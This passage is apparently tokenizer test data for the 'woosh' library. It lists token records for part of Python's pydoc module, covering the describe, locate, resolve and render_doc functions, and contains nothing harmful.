woosh.Token(woosh.NAME, 'isclass', 1700, 15, 1700, 22),
woosh.Token(woosh.OP, '(', 1700, 22, 1700, 23),
woosh.Token(woosh.NAME, 'thing', 1700, 23, 1700, 28),
woosh.Token(woosh.OP, ')', 1700, 28, 1700, 29),
woosh.Token(woosh.OP, ':', 1700, 29, 1700, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1700, 30, 1701, 0),
woosh.Token(woosh.INDENT, ' ', 1701, 0, 1701, 8),
woosh.Token(woosh.NAME, 'return', 1701, 8, 1701, 14),
woosh.Token(woosh.STRING, "'class '", 1701, 15, 1701, 23),
woosh.Token(woosh.OP, '+', 1701, 24, 1701, 25),
woosh.Token(woosh.NAME, 'thing', 1701, 26, 1701, 31),
woosh.Token(woosh.OP, '.', 1701, 31, 1701, 32),
woosh.Token(woosh.NAME, '__name__', 1701, 32, 1701, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 1701, 40, 1702, 0),
woosh.Token(woosh.DEDENT, ' ', 1702, 0, 1702, 4),
woosh.Token(woosh.NAME, 'if', 1702, 4, 1702, 6),
woosh.Token(woosh.NAME, 'inspect', 1702, 7, 1702, 14),
woosh.Token(woosh.OP, '.', 1702, 14, 1702, 15),
woosh.Token(woosh.NAME, 'isfunction', 1702, 15, 1702, 25),
woosh.Token(woosh.OP, '(', 1702, 25, 1702, 26),
woosh.Token(woosh.NAME, 'thing', 1702, 26, 1702, 31),
woosh.Token(woosh.OP, ')', 1702, 31, 1702, 32),
woosh.Token(woosh.OP, ':', 1702, 32, 1702, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1702, 33, 1703, 0),
woosh.Token(woosh.INDENT, ' ', 1703, 0, 1703, 8),
woosh.Token(woosh.NAME, 'return', 1703, 8, 1703, 14),
woosh.Token(woosh.STRING, "'function '", 1703, 15, 1703, 26),
woosh.Token(woosh.OP, '+', 1703, 27, 1703, 28),
woosh.Token(woosh.NAME, 'thing', 1703, 29, 1703, 34),
woosh.Token(woosh.OP, '.', 1703, 34, 1703, 35),
woosh.Token(woosh.NAME, '__name__', 1703, 35, 1703, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1703, 43, 1704, 0),
woosh.Token(woosh.DEDENT, ' ', 1704, 0, 1704, 4),
woosh.Token(woosh.NAME, 'if', 1704, 4, 1704, 6),
woosh.Token(woosh.NAME, 'inspect', 1704, 7, 1704, 14),
woosh.Token(woosh.OP, '.', 1704, 14, 1704, 15),
woosh.Token(woosh.NAME, 'ismethod', 1704, 15, 1704, 23),
woosh.Token(woosh.OP, '(', 1704, 23, 1704, 24),
woosh.Token(woosh.NAME, 'thing', 1704, 24, 1704, 29),
woosh.Token(woosh.OP, ')', 1704, 29, 1704, 30),
woosh.Token(woosh.OP, ':', 1704, 30, 1704, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1704, 31, 1705, 0),
woosh.Token(woosh.INDENT, ' ', 1705, 0, 1705, 8),
woosh.Token(woosh.NAME, 'return', 1705, 8, 1705, 14),
woosh.Token(woosh.STRING, "'method '", 1705, 15, 1705, 24),
woosh.Token(woosh.OP, '+', 1705, 25, 1705, 26),
woosh.Token(woosh.NAME, 'thing', 1705, 27, 1705, 32),
woosh.Token(woosh.OP, '.', 1705, 32, 1705, 33),
woosh.Token(woosh.NAME, '__name__', 1705, 33, 1705, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1705, 41, 1706, 0),
woosh.Token(woosh.DEDENT, ' ', 1706, 0, 1706, 4),
woosh.Token(woosh.NAME, 'return', 1706, 4, 1706, 10),
woosh.Token(woosh.NAME, 'type', 1706, 11, 1706, 15),
woosh.Token(woosh.OP, '(', 1706, 15, 1706, 16),
woosh.Token(woosh.NAME, 'thing', 1706, 16, 1706, 21),
woosh.Token(woosh.OP, ')', 1706, 21, 1706, 22),
woosh.Token(woosh.OP, '.', 1706, 22, 1706, 23),
woosh.Token(woosh.NAME, '__name__', 1706, 23, 1706, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1706, 31, 1707, 0),
woosh.Token(woosh.DEDENT, '', 1708, 0, 1708, 0),
woosh.Token(woosh.NAME, 'def', 1708, 0, 1708, 3),
woosh.Token(woosh.NAME, 'locate', 1708, 4, 1708, 10),
woosh.Token(woosh.OP, '(', 1708, 10, 1708, 11),
woosh.Token(woosh.NAME, 'path', 1708, 11, 1708, 15),
woosh.Token(woosh.OP, ',', 1708, 15, 1708, 16),
woosh.Token(woosh.NAME, 'forceload', 1708, 17, 1708, 26),
woosh.Token(woosh.OP, '=', 1708, 26, 1708, 27),
woosh.Token(woosh.NUMBER, '0', 1708, 27, 1708, 28),
woosh.Token(woosh.OP, ')', 1708, 28, 1708, 29),
woosh.Token(woosh.OP, ':', 1708, 29, 1708, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1708, 30, 1709, 0),
woosh.Token(woosh.INDENT, ' ', 1709, 0, 1709, 4),
woosh.Token(woosh.STRING, '"""Locate an object by name or dotted path, importing as necessary."""', 1709, 4, 1709, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 1709, 74, 1710, 0),
woosh.Token(woosh.NAME, 'parts', 1710, 4, 1710, 9),
woosh.Token(woosh.OP, '=', 1710, 10, 1710, 11),
woosh.Token(woosh.OP, '[', 1710, 12, 1710, 13),
woosh.Token(woosh.NAME, 'part', 1710, 13, 1710, 17),
woosh.Token(woosh.NAME, 'for', 1710, 18, 1710, 21),
woosh.Token(woosh.NAME, 'part', 1710, 22, 1710, 26),
woosh.Token(woosh.NAME, 'in', 1710, 27, 1710, 29),
woosh.Token(woosh.NAME, 'path', 1710, 30, 1710, 34),
woosh.Token(woosh.OP, '.', 1710, 34, 1710, 35),
woosh.Token(woosh.NAME, 'split', 1710, 35, 1710, 40),
woosh.Token(woosh.OP, '(', 1710, 40, 1710, 41),
woosh.Token(woosh.STRING, "'.'", 1710, 41, 1710, 44),
woosh.Token(woosh.OP, ')', 1710, 44, 1710, 45),
woosh.Token(woosh.NAME, 'if', 1710, 46, 1710, 48),
woosh.Token(woosh.NAME, 'part', 1710, 49, 1710, 53),
woosh.Token(woosh.OP, ']', 1710, 53, 1710, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1710, 54, 1711, 0),
woosh.Token(woosh.NAME, 'module', 1711, 4, 1711, 10),
woosh.Token(woosh.OP, ',', 1711, 10, 1711, 11),
woosh.Token(woosh.NAME, 'n', 1711, 12, 1711, 13),
woosh.Token(woosh.OP, '=', 1711, 14, 1711, 15),
woosh.Token(woosh.NAME, 'None', 1711, 16, 1711, 20),
woosh.Token(woosh.OP, ',', 1711, 20, 1711, 21),
woosh.Token(woosh.NUMBER, '0', 1711, 22, 1711, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1711, 23, 1712, 0),
woosh.Token(woosh.NAME, 'while', 1712, 4, 1712, 9),
woosh.Token(woosh.NAME, 'n', 1712, 10, 1712, 11),
woosh.Token(woosh.OP, '<', 1712, 12, 1712, 13),
woosh.Token(woosh.NAME, 'len', 1712, 14, 1712, 17),
woosh.Token(woosh.OP, '(', 1712, 17, 1712, 18),
woosh.Token(woosh.NAME, 'parts', 1712, 18, 1712, 23),
woosh.Token(woosh.OP, ')', 1712, 23, 1712, 24),
woosh.Token(woosh.OP, ':', 1712, 24, 1712, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1712, 25, 1713, 0),
woosh.Token(woosh.INDENT, ' ', 1713, 0, 1713, 8),
woosh.Token(woosh.NAME, 'nextmodule', 1713, 8, 1713, 18),
woosh.Token(woosh.OP, '=', 1713, 19, 1713, 20),
woosh.Token(woosh.NAME, 'safeimport', 1713, 21, 1713, 31),
woosh.Token(woosh.OP, '(', 1713, 31, 1713, 32),
woosh.Token(woosh.STRING, "'.'", 1713, 32, 1713, 35),
woosh.Token(woosh.OP, '.', 1713, 35, 1713, 36),
woosh.Token(woosh.NAME, 'join', 1713, 36, 1713, 40),
woosh.Token(woosh.OP, '(', 1713, 40, 1713, 41),
woosh.Token(woosh.NAME, 'parts', 1713, 41, 1713, 46),
woosh.Token(woosh.OP, '[', 1713, 46, 1713, 47),
woosh.Token(woosh.OP, ':', 1713, 47, 1713, 48),
woosh.Token(woosh.NAME, 'n', 1713, 48, 1713, 49),
woosh.Token(woosh.OP, '+', 1713, 49, 1713, 50),
woosh.Token(woosh.NUMBER, '1', 1713, 50, 1713, 51),
woosh.Token(woosh.OP, ']', 1713, 51, 1713, 52),
woosh.Token(woosh.OP, ')', 1713, 52, 1713, 53),
woosh.Token(woosh.OP, ',', 1713, 53, 1713, 54),
woosh.Token(woosh.NAME, 'forceload', 1713, 55, 1713, 64),
woosh.Token(woosh.OP, ')', 1713, 64, 1713, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 1713, 65, 1714, 0),
woosh.Token(woosh.NAME, 'if', 1714, 8, 1714, 10),
woosh.Token(woosh.NAME, 'nextmodule', 1714, 11, 1714, 21),
woosh.Token(woosh.OP, ':', 1714, 21, 1714, 22),
woosh.Token(woosh.NAME, 'module', 1714, 23, 1714, 29),
woosh.Token(woosh.OP, ',', 1714, 29, 1714, 30),
woosh.Token(woosh.NAME, 'n', 1714, 31, 1714, 32),
woosh.Token(woosh.OP, '=', 1714, 33, 1714, 34),
woosh.Token(woosh.NAME, 'nextmodule', 1714, 35, 1714, 45),
woosh.Token(woosh.OP, ',', 1714, 45, 1714, 46),
woosh.Token(woosh.NAME, 'n', 1714, 47, 1714, 48),
woosh.Token(woosh.OP, '+', 1714, 49, 1714, 50),
woosh.Token(woosh.NUMBER, '1', 1714, 51, 1714, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1714, 52, 1715, 0),
woosh.Token(woosh.NAME, 'else', 1715, 8, 1715, 12),
woosh.Token(woosh.OP, ':', 1715, 12, 1715, 13),
woosh.Token(woosh.NAME, 'break', 1715, 14, 1715, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 1715, 19, 1716, 0),
woosh.Token(woosh.DEDENT, ' ', 1716, 0, 1716, 4),
woosh.Token(woosh.NAME, 'if', 1716, 4, 1716, 6),
woosh.Token(woosh.NAME, 'module', 1716, 7, 1716, 13),
woosh.Token(woosh.OP, ':', 1716, 13, 1716, 14),
woosh.Token(woosh.NEWLINE, '\r\n', 1716, 14, 1717, 0),
woosh.Token(woosh.INDENT, ' ', 1717, 0, 1717, 8),
woosh.Token(woosh.NAME, 'object', 1717, 8, 1717, 14),
woosh.Token(woosh.OP, '=', 1717, 15, 1717, 16),
woosh.Token(woosh.NAME, 'module', 1717, 17, 1717, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1717, 23, 1718, 0),
woosh.Token(woosh.DEDENT, ' ', 1718, 0, 1718, 4),
woosh.Token(woosh.NAME, 'else', 1718, 4, 1718, 8),
woosh.Token(woosh.OP, ':', 1718, 8, 1718, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 1718, 9, 1719, 0),
woosh.Token(woosh.INDENT, ' ', 1719, 0, 1719, 8),
woosh.Token(woosh.NAME, 'object', 1719, 8, 1719, 14),
woosh.Token(woosh.OP, '=', 1719, 15, 1719, 16),
woosh.Token(woosh.NAME, 'builtins', 1719, 17, 1719, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1719, 25, 1720, 0),
woosh.Token(woosh.DEDENT, ' ', 1720, 0, 1720, 4),
woosh.Token(woosh.NAME, 'for', 1720, 4, 1720, 7),
woosh.Token(woosh.NAME, 'part', 1720, 8, 1720, 12),
woosh.Token(woosh.NAME, 'in', 1720, 13, 1720, 15),
woosh.Token(woosh.NAME, 'parts', 1720, 16, 1720, 21),
woosh.Token(woosh.OP, '[', 1720, 21, 1720, 22),
woosh.Token(woosh.NAME, 'n', 1720, 22, 1720, 23),
woosh.Token(woosh.OP, ':', 1720, 23, 1720, 24),
woosh.Token(woosh.OP, ']', 1720, 24, 1720, 25),
woosh.Token(woosh.OP, ':', 1720, 25, 1720, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1720, 26, 1721, 0),
woosh.Token(woosh.INDENT, ' ', 1721, 0, 1721, 8),
woosh.Token(woosh.NAME, 'try', 1721, 8, 1721, 11),
woosh.Token(woosh.OP, ':', 1721, 11, 1721, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1721, 12, 1722, 0),
woosh.Token(woosh.INDENT, ' ', 1722, 0, 1722, 12),
woosh.Token(woosh.NAME, 'object', 1722, 12, 1722, 18),
woosh.Token(woosh.OP, '=', 1722, 19, 1722, 20),
woosh.Token(woosh.NAME, 'getattr', 1722, 21, 1722, 28),
woosh.Token(woosh.OP, '(', 1722, 28, 1722, 29),
woosh.Token(woosh.NAME, 'object', 1722, 29, 1722, 35),
woosh.Token(woosh.OP, ',', 1722, 35, 1722, 36),
woosh.Token(woosh.NAME, 'part', 1722, 37, 1722, 41),
woosh.Token(woosh.OP, ')', 1722, 41, 1722, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1722, 42, 1723, 0),
woosh.Token(woosh.DEDENT, ' ', 1723, 0, 1723, 8),
woosh.Token(woosh.NAME, 'except', 1723, 8, 1723, 14),
woosh.Token(woosh.NAME, 'AttributeError', 1723, 15, 1723, 29),
woosh.Token(woosh.OP, ':', 1723, 29, 1723, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1723, 30, 1724, 0),
woosh.Token(woosh.INDENT, ' ', 1724, 0, 1724, 12),
woosh.Token(woosh.NAME, 'return', 1724, 12, 1724, 18),
woosh.Token(woosh.NAME, 'None', 1724, 19, 1724, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1724, 23, 1725, 0),
woosh.Token(woosh.DEDENT, ' ', 1725, 0, 1725, 4),
woosh.Token(woosh.DEDENT, '', 1725, 4, 1725, 4),
woosh.Token(woosh.NAME, 'return', 1725, 4, 1725, 10),
woosh.Token(woosh.NAME, 'object', 1725, 11, 1725, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1725, 17, 1726, 0),
woosh.Token(woosh.COMMENT, '# --------------------------------------- interactive interpreter interface', 1727, 0, 1727, 75),
woosh.Token(woosh.DEDENT, '', 1729, 0, 1729, 0),
woosh.Token(woosh.NAME, 'text', 1729, 0, 1729, 4),
woosh.Token(woosh.OP, '=', 1729, 5, 1729, 6),
woosh.Token(woosh.NAME, 'TextDoc', 1729, 7, 1729, 14),
woosh.Token(woosh.OP, '(', 1729, 14, 1729, 15),
woosh.Token(woosh.OP, ')', 1729, 15, 1729, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1729, 16, 1730, 0),
woosh.Token(woosh.NAME, 'plaintext', 1730, 0, 1730, 9),
woosh.Token(woosh.OP, '=', 1730, 10, 1730, 11),
woosh.Token(woosh.NAME, '_PlainTextDoc', 1730, 12, 1730, 25),
woosh.Token(woosh.OP, '(', 1730, 25, 1730, 26),
woosh.Token(woosh.OP, ')', 1730, 26, 1730, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1730, 27, 1731, 0),
woosh.Token(woosh.NAME, 'html', 1731, 0, 1731, 4),
woosh.Token(woosh.OP, '=', 1731, 5, 1731, 6),
woosh.Token(woosh.NAME, 'HTMLDoc', 1731, 7, 1731, 14),
woosh.Token(woosh.OP, '(', 1731, 14, 1731, 15),
woosh.Token(woosh.OP, ')', 1731, 15, 1731, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1731, 16, 1732, 0),
woosh.Token(woosh.NAME, 'def', 1733, 0, 1733, 3),
woosh.Token(woosh.NAME, 'resolve', 1733, 4, 1733, 11),
woosh.Token(woosh.OP, '(', 1733, 11, 1733, 12),
woosh.Token(woosh.NAME, 'thing', 1733, 12, 1733, 17),
woosh.Token(woosh.OP, ',', 1733, 17, 1733, 18),
woosh.Token(woosh.NAME, 'forceload', 1733, 19, 1733, 28),
woosh.Token(woosh.OP, '=', 1733, 28, 1733, 29),
woosh.Token(woosh.NUMBER, '0', 1733, 29, 1733, 30),
woosh.Token(woosh.OP, ')', 1733, 30, 1733, 31),
woosh.Token(woosh.OP, ':', 1733, 31, 1733, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1733, 32, 1734, 0),
woosh.Token(woosh.INDENT, ' ', 1734, 0, 1734, 4),
woosh.Token(woosh.STRING, '"""Given an object or a path to an object, get the object and its name."""', 1734, 4, 1734, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 1734, 78, 1735, 0),
woosh.Token(woosh.NAME, 'if', 1735, 4, 1735, 6),
woosh.Token(woosh.NAME, 'isinstance', 1735, 7, 1735, 17),
woosh.Token(woosh.OP, '(', 1735, 17, 1735, 18),
woosh.Token(woosh.NAME, 'thing', 1735, 18, 1735, 23),
woosh.Token(woosh.OP, ',', 1735, 23, 1735, 24),
woosh.Token(woosh.NAME, 'str', 1735, 25, 1735, 28),
woosh.Token(woosh.OP, ')', 1735, 28, 1735, 29),
woosh.Token(woosh.OP, ':', 1735, 29, 1735, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1735, 30, 1736, 0),
woosh.Token(woosh.INDENT, ' ', 1736, 0, 1736, 8),
woosh.Token(woosh.NAME, 'object', 1736, 8, 1736, 14),
woosh.Token(woosh.OP, '=', 1736, 15, 1736, 16),
woosh.Token(woosh.NAME, 'locate', 1736, 17, 1736, 23),
woosh.Token(woosh.OP, '(', 1736, 23, 1736, 24),
woosh.Token(woosh.NAME, 'thing', 1736, 24, 1736, 29),
woosh.Token(woosh.OP, ',', 1736, 29, 1736, 30),
woosh.Token(woosh.NAME, 'forceload', 1736, 31, 1736, 40),
woosh.Token(woosh.OP, ')', 1736, 40, 1736, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1736, 41, 1737, 0),
woosh.Token(woosh.NAME, 'if', 1737, 8, 1737, 10),
woosh.Token(woosh.NAME, 'object', 1737, 11, 1737, 17),
woosh.Token(woosh.NAME, 'is', 1737, 18, 1737, 20),
woosh.Token(woosh.NAME, 'None', 1737, 21, 1737, 25),
woosh.Token(woosh.OP, ':', 1737, 25, 1737, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1737, 26, 1738, 0),
woosh.Token(woosh.INDENT, ' ', 1738, 0, 1738, 12),
woosh.Token(woosh.NAME, 'raise', 1738, 12, 1738, 17),
woosh.Token(woosh.NAME, 'ImportError', 1738, 18, 1738, 29),
woosh.Token(woosh.OP, '(', 1738, 29, 1738, 30),
woosh.Token(woosh.STRING, "'''\\\r\nNo Python documentation found for %r.\r\nUse help() to get the interactive help utility.\r\nUse help(str) for help on the str class.'''", 1738, 30, 1741, 43),
woosh.Token(woosh.OP, '%', 1741, 44, 1741, 45),
woosh.Token(woosh.NAME, 'thing', 1741, 46, 1741, 51),
woosh.Token(woosh.OP, ')', 1741, 51, 1741, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1741, 52, 1742, 0),
woosh.Token(woosh.DEDENT, ' ', 1742, 0, 1742, 8),
woosh.Token(woosh.NAME, 'return', 1742, 8, 1742, 14),
woosh.Token(woosh.NAME, 'object', 1742, 15, 1742, 21),
woosh.Token(woosh.OP, ',', 1742, 21, 1742, 22),
woosh.Token(woosh.NAME, 'thing', 1742, 23, 1742, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1742, 28, 1743, 0),
woosh.Token(woosh.DEDENT, ' ', 1743, 0, 1743, 4),
woosh.Token(woosh.NAME, 'else', 1743, 4, 1743, 8),
woosh.Token(woosh.OP, ':', 1743, 8, 1743, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 1743, 9, 1744, 0),
woosh.Token(woosh.INDENT, ' ', 1744, 0, 1744, 8),
woosh.Token(woosh.NAME, 'name', 1744, 8, 1744, 12),
woosh.Token(woosh.OP, '=', 1744, 13, 1744, 14),
woosh.Token(woosh.NAME, 'getattr', 1744, 15, 1744, 22),
woosh.Token(woosh.OP, '(', 1744, 22, 1744, 23),
woosh.Token(woosh.NAME, 'thing', 1744, 23, 1744, 28),
woosh.Token(woosh.OP, ',', 1744, 28, 1744, 29),
woosh.Token(woosh.STRING, "'__name__'", 1744, 30, 1744, 40),
woosh.Token(woosh.OP, ',', 1744, 40, 1744, 41),
woosh.Token(woosh.NAME, 'None', 1744, 42, 1744, 46),
woosh.Token(woosh.OP, ')', 1744, 46, 1744, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1744, 47, 1745, 0),
woosh.Token(woosh.NAME, 'return', 1745, 8, 1745, 14),
woosh.Token(woosh.NAME, 'thing', 1745, 15, 1745, 20),
woosh.Token(woosh.OP, ',', 1745, 20, 1745, 21),
woosh.Token(woosh.NAME, 'name', 1745, 22, 1745, 26),
woosh.Token(woosh.NAME, 'if', 1745, 27, 1745, 29),
woosh.Token(woosh.NAME, 'isinstance', 1745, 30, 1745, 40),
woosh.Token(woosh.OP, '(', 1745, 40, 1745, 41),
woosh.Token(woosh.NAME, 'name', 1745, 41, 1745, 45),
woosh.Token(woosh.OP, ',', 1745, 45, 1745, 46),
woosh.Token(woosh.NAME, 'str', 1745, 47, 1745, 50),
woosh.Token(woosh.OP, ')', 1745, 50, 1745, 51),
woosh.Token(woosh.NAME, 'else', 1745, 52, 1745, 56),
woosh.Token(woosh.NAME, 'None', 1745, 57, 1745, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 1745, 61, 1746, 0),
woosh.Token(woosh.DEDENT, '', 1747, 0, 1747, 0),
woosh.Token(woosh.DEDENT, '', 1747, 0, 1747, 0),
woosh.Token(woosh.NAME, 'def', 1747, 0, 1747, 3),
woosh.Token(woosh.NAME, 'render_doc', 1747, 4, 1747, 14),
woosh.Token(woosh.OP, '(', 1747, 14, 1747, 15),
woosh.Token(woosh.NAME, 'thing', 1747, 15, 1747, 20),
woosh.Token(woosh.OP, ',', 1747, 20, 1747, 21),
woosh.Token(woosh.NAME, 'title', 1747, 22, 1747, 27),
woosh.Token(woosh.OP, '=', 1747, 27, 1747, 28),
woosh.Token(woosh.STRING, "'Python Library Documentation: %s'", 1747, 28, 1747, 62),
woosh.Token(woosh.OP, ',', 1747, 62, 1747, 63),
woosh.Token(woosh.NAME, 'forceload', 1747, 64, 1747, 73),
woosh.Token(woosh.OP, '=', 1747, 73, 1747, 74),
woosh.Token(woosh.NUMBER, '0', 1747, 74, 1747, 75),
woosh.Token(woosh.OP, ',', 1747, 75, 1747, 76),
woosh.Token(woosh.NAME, 'renderer', 1748, 8, 1748, 16),
woosh.Token(woosh.OP, '=', 1748, 16, 1748, 17),
woosh.Token(woosh.NAME, 'None', 1748, 17, 1748, 21),
woosh.Token(woosh.OP, ')', 1748, 21, 1748, 22),
woosh.Token(woosh.OP, ':', 1748, 22, 1748, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1748, 23, 1749, 0),
woosh.Token(woosh.INDENT, ' ', 1749, 0, 1749, 4),
woosh.Token(woosh.STRING, '"""Render text documentation, given an object or a path to an object."""', 1749, 4, 1749, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 1749, 76, 1750, 0),
woosh.Token(woosh.NAME, 'if', 1750, 4, 1750, 6),
woosh.Token(woosh.NAME, 'renderer', 1750, 7, 1750, 15),
woosh.Token(woosh.NAME, 'is', 1750, 16, 1750, 18),
woosh.Token(woosh.NAME, 'None', 1750, 19, 1750, 23),
woosh.Token(woosh.OP, ':', 1750, 23, 1750, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1750, 24, 1751, 0),
woosh.Token(woosh.INDENT, ' ', 1751, 0, 1751, 8),
woosh.Token(woosh.NAME, 'renderer', 1751, 8, 1751, 16),
woosh.Token(woosh.OP, '=', 1751, 17, 1751, 18),
woosh.Token(woosh.NAME, 'text', 1751, 19, 1751, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1751, 23, 1752, 0),
woosh.Token(woosh.DEDENT, ' ', 1752, 0, 1752, 4),
woosh.Token(woosh.NAME, 'object', 1752, 4, 1752, 10),
woosh.Token(woosh.OP, ',', 1752, 10, 1752, 11),
woosh.Token(woosh.NAME, 'name', 1752, 12, 1752, 16),
woosh.Token(woosh.OP, '=', 1752, 17, 1752, 18),
woosh.Token(woosh.NAME, 'resolve', 1752, 19, 1752, 26),
woosh.Token(woosh.OP, '(', 1752, 26, 1752, 27),
woosh.Token(woosh.NAME, 'thing', 1752, 27, 1752, 32),
woosh.Token(woosh.OP, ',', 1752, 32, 1752, 33),
woosh.Token(woosh.NAME, 'forceload', 1752, 34, 1752, 43),
woosh.Token(woosh.OP, ')', 1752, 43, 1752, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 1752, 44, 1753, 0),
woosh.Token(woosh.NAME, 'desc', 1753, 4, 1753, 8),
woosh.Token(woosh.OP, '=', 1753, 9, 1753, 10),
woosh.Token(woosh.NAME, 'describe', 1753, 11, 1753, 19),
woosh.Token(woosh.OP, '(', 1753, 19, 1753, 20),
woosh.Token(woosh.NAME, 'object', 1753, 20, 1753, 26),
woosh.Token(woosh.OP, ')', 1753, 26, 1753, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1753, 27, 1754, 0),
woosh.Token(woosh.NAME, 'module', 1754, 4, 1754, 10),
woosh.Token(woosh.OP, '=', 1754, 11, 1754, 12),
woosh.Token(woosh.NAME, 'inspect', 1754, 13, 1754, 20),
woosh.Token(woosh.OP, '.', 1754, 20, 1754, 21),
woosh.Token(woosh.NAME, 'getmodule', 1754, 21, 1754, 30),
woosh.Token(woosh.OP, '(', 1754, 30, 1754, 31),
woosh.Token(woosh.NAME, 'object', 1754, 31, 1754, 37),
woosh.Token(woosh.OP, ')', 1754, 37, 1754, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1754, 38, 1755, 0),
woosh.Token(woosh.NAME, 'if', 1755, 4, 1755, 6),
woosh.Token(woosh.NAME, 'name', 1755, 7, 1755, 11),
woosh.Token(woosh.NAME, 'and', 1755, 12, 1755, 15),
woosh.Token(woosh.STRING, "'.'", 1755, 16, 1755, 19),
woosh.Token(woosh.NAME, 'in', 1755, 20, 1755, 22),
woosh.Token(woosh.NAME, 'name', 1755, 23, 1755, 27),
woosh.Token(woosh.OP, ':', 1755, 27, 1755, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1755, 28, 1756, 0),
woosh.Token(woosh.INDENT, ' ', 1756, 0, 1756, 8),
woosh.Token(woosh.NAME, 'desc', 1756, 8, 1756, 12),
woosh.Token(woosh.OP, '+=', 1756, 13, 1756, 15),
woosh.Token(woosh.STRING, "' in '", 1756, 16, 1756, 22),
woosh.Token(woosh.OP, '+', 1756, 23, 1756, 24),
woosh.Token(woosh.NAME, 'name', 1756, 25, 1756, 29),
woosh.Token(woosh.OP, '[', 1756, 29, 1756, 30),
woosh.Token(woosh.OP, ':', 1756, 30, 1756, 31),
woosh.Token(woosh.NAME, 'name', 1756, 31, 1756, 35),
woosh.Token(woosh.OP, '.', 1756, 35, 1756, 36),
woosh.Token(woosh.NAME, 'rfind', 1756, 36, 1756, 41),
woosh.Token(woosh.OP, '(', 1756, 41, 1756, 42),
woosh.Token(woosh.STRING, "'.'", 1756, 42, 1756, 45),
woosh.Token(woosh.OP, ')', 1756, 45, 1756, 46),
woosh.Token(woosh.OP, ']', 1756, 46, 1756, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1756, 47, 1757, 0),
woosh.Token(woosh.DEDENT, ' ', 1757, 0, 1757, 4),
woosh.Token(woosh.NAME, 'elif', 1757, 4, 1757, 8),
woosh.Token(woosh.NAME, 'module', 1757, 9, 1757, 15),
woosh.Token(woosh.NAME, 'and', 1757, 16, 1757, 19),
woosh.Token(woosh.NAME, 'module', 1757, 20, 1757, 26),
woosh.Token(woosh.NAME, 'is', 1757, 27, 1757, 29),
woosh.Token(woosh.NAME, 'not', 1757, 30, 1757, 33),
woosh.Token(woosh.NAME, 'object', 1757, 34, 1757, 40),
woosh.Token(woosh.OP, ':', 1757, 40, 1757, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1757, 41, 1758, 0),
woosh.Token(woosh.INDENT, ' ', 1758, 0, 1758, 8),
woosh.Token(woosh.NAME, 'desc', 1758, 8, 1758, 12),
woosh.Token(woosh.OP, '+=', 1758, 13, 1758, 15),
woosh.Token(woosh.STRING, "' in module '", 1758, 16, 1758, 29),
woosh.Token(woosh.OP, '+', 1758, 30, 1758, 31),
woosh.Token(woosh.NAME, 'module', 1758, 32, 1758, 38),
woosh.Token(woosh.OP, '.', 1758, 38, 1758, 39),
woosh.Token(woosh.NAME, '__name__', 1758, 39, 1758, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1758, 47, 1759, 0),
woosh.Token(woosh.DEDENT, ' ', 1760, 0, 1760, 4),
woosh.Token(woosh.NAME, 'if', 1760, 4, 1760, 6),
woosh.Token(woosh.NAME, 'not', 1760, 7, 1760, 10),
woosh.Token(woosh.OP, '(', 1760, 11, 1760, 12),
woosh.Token(woosh.NAME, 'inspect', 1760, 12, 1760, 19),
woosh.Token(woosh.OP, '.', 1760, 19, 1760, 20),
woosh.Token(woosh.NAME, 'ismodule', 1760, 20, 1760, 28),
woosh.Token(woosh.OP, '(', 1760, 28, 1760, 29),
woosh.Token(woosh.NAME, 'object', 1760, 29, 1760, 35),
woosh.Token(woosh.OP, ')', 1760, 35, 1760, 36),
woosh.Token(woosh.NAME, 'or', 1760, 37, 1760, 39),
woosh.Token(woosh.NAME, 'inspect', 1761, 14, 1761, 21),
woosh.Token(woosh.OP, '.', 1761, 21, 1761, 22),
woosh.Token(woosh.NAME, 'isclass', 1761, 22, 1761, 29),
woosh.Token(woosh.OP, '(', 1761, 29, 1761, 30),
woosh.Token(woosh.NAME, 'object', 1761, 30, 1761, 36),
woosh.Token(woosh.OP, ')', 1761, 36, 1761, 37),
woosh.Token(woosh.NAME, 'or', 1761, 38, 1761, 40),
